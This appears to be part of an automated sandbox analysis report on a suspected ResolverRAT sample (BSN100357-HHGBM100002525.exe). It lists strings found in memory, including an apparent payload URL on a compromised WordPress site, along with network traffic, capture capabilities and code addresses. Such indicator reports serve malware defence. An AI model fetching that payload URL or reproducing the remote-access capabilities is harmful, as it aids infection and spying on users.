Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.clients6.google.com
Source: chrome.exe, 00000012.00000003.1849210701.000001E300040000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/Ge
Source: chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.clients6.google.comU
Source: chrome.exe, 00000012.00000000.1625354440.0000174400069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1&awwd=1
Source: chrome.exe, 00000012.00000000.1627312655.0000174400214000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1&awwd=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origi
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000012.00000000.1627681006.0000174400284000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1&dc=1
Source: chrome.exe, 00000012.00000000.1627312655.0000174400214000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1&dc=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origin
Source: chrome.exe, 00000009.00000003.1640585351.0000610C019AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000009.00000003.1640585351.0000610C019AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1748358103&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 00000009.00000003.1458349676.0000610C01478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486603570.0000610C004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486703514.0000610C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497950032.00000F3C00AC8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497385618.00000F3C00934000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 00000012.00000000.1626351423.0000174400120000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://plus.google.com
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://plus.google.comU
Source: chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://plus.googleapis.comU
Source: chrome.exe, 0000000C.00000000.1483842298.0000021E00100000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/gemini/answer/13594961?hl=en#location_info&zippy=%2Cwhat-location-informa
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/gemini?p=chrome_PH2G
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/gemini?p=chrome_PHb
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/gemini?p=chrome_ks_win2
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/gemini?p=chrome_min_win2R
Source: chrome.exe, 0000000C.00000000.1499280638.00000F3C00CED000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1633724909.0000174400728000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://svgwg.org/svg2-draft/single-page.html#render-OverflowAndClipProperties
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000009.00000003.1518703844.0000610C0104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://use.typekit.net
Source: chrome.exe, 00000009.00000003.1517883635.0000610C01C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web.whatsapp.com/
Source: chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1U
Source: chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/Terms
Source: chrome.exe, 00000012.00000000.1627142529.00001744001E9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1629956275.0000174400484000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000000C.00000000.1483842298.0000021E00100000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/U
Source: chrome.exe, 00000009.00000003.1457409309.0000610C00458000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en-GB&tab=ri&ogbl
Source: chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en-GB&tab=ri&ogbl
Source: chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627272233.0000174400204000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en-GB/about/products?tab=rh
Source: chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en-GB/about/products?tab=rhU
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com25
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617121892.00004FCC005B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588052234.00004FCC005B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/gemini2%
Source: chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.meU
Source: chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommendedU
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000009.00000003.1449559042.0000610C010B9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000009.00000003.1748619590.0000610C01404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/_/apps-fileview/_/js/
Source: chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635698672.0000174400A7A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627681006.0000174400284000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chrome.exe, 00000012.00000000.1626051186.00001744000D9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
Source: chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
Source: chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635698672.0000174400A7A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635698672.0000174400A7A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000012.00000000.1628047168.0000174400318000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.cssgoogle-eng
Source: chrome.exe, 00000012.00000000.1635078197.0000174400804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000009.00000003.1487646748.0000610C01910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487143700.0000610C01988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487185647.0000610C01990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1457639445.0000610C01728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635134612.000017440083C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635078197.0000174400804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627354681.0000174400228000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1633648077.0000174400718000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Dc7JXiCcgsg.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1626126561.00001744000F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627354681.0000174400228000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1633648077.0000174400718000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.5c6aA4L6wRM.L.W.O/m=qmd
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390912360.00000000063A0000.00000004.08000000.00040000.00000008.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000002.1390912360.00000000063A0000.00000004.08000000.00040000.00000008.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.vastkupan.com
Source: BSN100357-HHGBM100002525.exe, BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002961000.00000004.00000800.00020000.00000000.sdmp, BSN100357-HHGBM100002525.exe, 00000000.00000000.1231008727.0000000000632000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.vastkupan.com/wp-admin/js/Daupinslenj.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 185.15.121.100:443 -> 192.168.2.6:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected ResolverRAT

Source: Yara match

File source: Process Memory Space: BSN100357-HHGBM100002525.exe PID: 6716, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

.NET source code contains very large array initializations

Source: 0.2.BSN100357-HHGBM100002525.exe.3c694b0.3.raw.unpack, Program.cs

Large array initialization: XoRG4H7MW: array initializer size 547392

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C45BD8 NtResumeThread,		0_2_06C45BD8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C45BD3 NtResumeThread,		0_2_06C45BD3

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F69610	0_2_00F69610
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F65917	0_2_00F65917
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F65918	0_2_00F65918
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F65EA8	0_2_00F65EA8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F65E9B	0_2_00F65E9B
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_00F65E20	0_2_00F65E20
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E1CB0	0_2_067E1CB0
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067ECD8F	0_2_067ECD8F
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3BCD	0_2_067E3BCD
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E5388	0_2_067E5388
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E8978	0_2_067E8978
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E0F50	0_2_067E0F50
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3F07	0_2_067E3F07
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3C4F	0_2_067E3C4F
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3C4C	0_2_067E3C4C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3C3C	0_2_067E3C3C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E1CA1	0_2_067E1CA1
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3A38	0_2_067E3A38
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3A28	0_2_067E3A28
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E3B3C	0_2_067E3B3C
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E8969	0_2_067E8969
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E31B0	0_2_067E31B0
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E31AF	0_2_067E31AF
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E1190	0_2_067E1190
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067E118F	0_2_067E118F
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F1E38	0_2_067F1E38
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F94C8	0_2_067F94C8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F2148	0_2_067F2148
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F1E28	0_2_067F1E28
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F94B9	0_2_067F94B9
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F3538	0_2_067F3538
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F3528	0_2_067F3528
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F9B80	0_2_067F9B80
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F0040	0_2_067F0040
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F003F	0_2_067F003F
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_067F2138	0_2_067F2138
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069CD7F0	0_2_069CD7F0
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069C1748	0_2_069C1748
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069CD7E1	0_2_069CD7E1
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069C173B	0_2_069C173B
